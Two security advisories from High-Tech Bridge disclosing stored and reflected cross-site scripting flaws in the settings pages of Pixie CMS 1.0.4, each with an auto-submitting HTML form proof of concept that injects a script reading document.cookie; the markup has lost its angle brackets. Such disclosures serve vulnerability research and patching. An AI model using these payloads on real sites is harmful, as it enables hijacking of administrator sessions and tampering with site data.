Stored XSS vulnerability in Pixie
Vulnerability ID: HTB22469
Reference:
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing
(http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the Pixie core settings saving
script to properly sanitize user-supplied input in sysmess variable.
Successful exploitation of this vulnerability could result in a compromise of
the application, theft of cookie-based authentication credentials, disclosure
or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is
available:
form accept-charset=UTF-8
action=http://host/admin/index.php?s=settingsx=pixie; method=post
name=main
input type=hidden name=langu value=en-gb /
input type=hidden name=time_zone value=+0 /
input type=hidden name=dstime value=no /
input type=hidden name=dateformat value=%Oe %B %Y, %H:%M /
input type=hidden name=rte value=1 /
input type=hidden name=logs value=5 /
input type=hidden name=sysmess value='hello
messagescriptalert(document.cookie)/script' /
input type=submit name=settings_edit id=form_addedit_submit
value=Update /
/form
script
document.getElementById('form_addedit_submit').click();
/script
XSS vulnerability in Pixie
Vulnerability ID: HTB22468
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_pixie.html
Product: Pixie
Vendor: Toggle Labs Ltd ( http://www.getpixie.co.uk/ )
Vulnerable Version: 1.0.4 and Probably Prior Versions
Vendor Notification: 01 July 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking Penetration Testing
(http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the site settings saving script to
properly sanitize user-supplied input in keywords variable. Successful
exploitation of this vulnerability could result in a compromise of the
application, theft of cookie-based authentication credentials, disclosure or
modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is
available:
form accept-charset=UTF-8
action=http://host/admin/index.php?s=settingsx=site; method=post
name=main
input type=hidden name=sitename value=Pixie /
input type=hidden name=url value=http://host/; /
input type=hidden name=default value=blog/ /
input type=hidden name=keywords
value='key1scriptalert(document.cookie)/script' /
input type=hidden name=site_auth value=sute author /
input type=hidden name=site_cright value=copyright /
input type=hidden name=cleanurls value=yes /
input type=submit name=settings_edit id=form_addedit_submit
value=Update /
/form
script
document.getElementById('form_addedit_submit').click();
/script
